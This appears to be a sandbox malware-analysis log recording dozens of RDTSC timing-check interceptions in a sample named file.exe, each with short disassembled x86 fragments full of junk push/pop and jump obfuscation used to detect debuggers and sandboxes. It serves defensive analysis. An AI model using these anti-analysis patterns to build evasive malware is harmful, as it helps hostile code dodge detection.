Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590BFA second address: 590CA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F40B477E79Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 jmp 00007F40B477E78Fh 0x00000017 pop ebx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F40B477E788h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 jmp 00007F40B477E793h 0x00000038 mov ebx, dword ptr [ebp+12484B88h] 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007F40B477E788h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 add eax, ebx 0x0000005a or cx, B08Bh 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jne 00007F40B477E788h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590CA8 second address: 590CB2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F40B515FBFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590CB2 second address: 590D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F40B477E788h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jc 00007F40B477E792h 0x00000029 jp 00007F40B477E78Ch 0x0000002f mov edx, dword ptr [ebp+1244F401h] 0x00000035 movzx ecx, dx 0x00000038 push 00000004h 0x0000003a sub di, 82F1h 0x0000003f nop 0x00000040 jmp 00007F40B477E795h 0x00000045 push eax 0x00000046 push edi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590D14 second address: 590D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590D18 second address: 590D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5845 second address: 5E584B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4A39 second address: 5E4A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F40B477E786h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4BA5 second address: 5E4BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 js 00007F40B515FBF6h 0x0000000d jno 00007F40B515FBF6h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4BB9 second address: 5E4BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4BC3 second address: 5E4BF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B515FC05h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4EBB second address: 5E4EC7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B477E786h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E530E second address: 5E532A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B515FBF6h 0x0000000a jmp 00007F40B515FC01h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E532A second address: 5E5330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5330 second address: 5E5336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5336 second address: 5E5368 instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F40B477E798h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F40B477E78Ch 0x00000019 jnl 00007F40B477E786h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5368 second address: 5E5389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F40B515FC01h 0x0000000c popad 0x0000000d jo 00007F40B515FBFCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ECBFC second address: 5ECC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ECC0D second address: 5ECC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ECC15 second address: 5ECC1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EAC5C second address: 5EAC60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EAC60 second address: 5EAC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F40B477E793h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EAC79 second address: 5EAC8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EAC8C second address: 5EACAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E792h 0x00000009 je 00007F40B477E786h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EACAC second address: 5EACD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F40B515FBF6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F40B515FBF6h 0x00000014 jmp 00007F40B515FC01h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EB1D8 second address: 5EB1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EB1DC second address: 5EB1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F40B515FBF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F40B515FBFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EB4CC second address: 5EB4E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E797h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EB4E9 second address: 5EB4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC59E second address: 5EC5BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E795h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC5BB second address: 5EC5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC5C1 second address: 5EC5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC872 second address: 5EC885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F40B515FBF6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F40B515FBF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC885 second address: 5EC88B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC88B second address: 5EC891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F342D second address: 5F343E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F40B477E786h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F71D2 second address: 5F71E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F40B515FBF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6598 second address: 5F659C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F659C second address: 5F65A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6715 second address: 5F6719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6719 second address: 5F6744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FBFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F40B515FC06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6B6A second address: 5F6B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6B6F second address: 5F6B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC03h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6EB3 second address: 5F6ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F40B477E791h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FCA63 second address: 5FCA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FCA6D second address: 5FCA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 jl 00007F40B477E798h 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F40B477E786h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FCA81 second address: 5FCA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FD021 second address: 5FD025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FD025 second address: 5FD02B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FDFA3 second address: 5FDFC4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B477E790h 0x00000008 jmp 00007F40B477E78Ah 0x0000000d pushad 0x0000000e jnp 00007F40B477E786h 0x00000014 jnp 00007F40B477E786h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6146DD second address: 6146E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F40B515FBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6146E7 second address: 6146EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6146EB second address: 6146F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6146F5 second address: 6146F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61824C second address: 618259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F40B515FBF6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 622FD5 second address: 622FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 622FD9 second address: 622FDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 628433 second address: 62846E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F40B477E786h 0x0000000a popad 0x0000000b jns 00007F40B477E788h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jmp 00007F40B477E799h 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ebx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jns 00007F40B477E78Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62846E second address: 628472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FA13 second address: 62FA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F40B477E786h 0x0000000e jne 00007F40B477E786h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FB6A second address: 62FB70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FB70 second address: 62FB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FB74 second address: 62FB82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FF66 second address: 62FF74 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F40B477E788h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62FF74 second address: 62FF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63012C second address: 630139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 630139 second address: 63013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63013F second address: 63015F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F40B477E793h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63015F second address: 630164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 630164 second address: 63016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63016C second address: 630170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 630445 second address: 630449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6354B2 second address: 6354B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6354B8 second address: 6354C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6354C1 second address: 6354E0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F40B515FC09h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6354E0 second address: 6354E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 644627 second address: 644639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FBFDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 642433 second address: 64243D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64243D second address: 642441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650337 second address: 650343 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650343 second address: 650347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6539A1 second address: 6539A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6539A7 second address: 6539AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6553A0 second address: 6553A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6553A5 second address: 6553BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F40B515FBF6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jl 00007F40B515FBF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E039 second address: 66E041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E041 second address: 66E045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E045 second address: 66E049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E882 second address: 66E888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66EB29 second address: 66EB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F40B477E786h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66EB36 second address: 66EB41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F40B515FBF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6706A0 second address: 6706BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F40B477E786h 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007F40B477E786h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6706BF second address: 6706DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F40B515FC08h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 673082 second address: 673086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 673086 second address: 6730A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F40B515FC00h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 673145 second address: 673149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 673149 second address: 673166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6733E3 second address: 6733E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6733E9 second address: 6733ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6733ED second address: 6733F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6733F1 second address: 673403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F40B515FBFEh 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
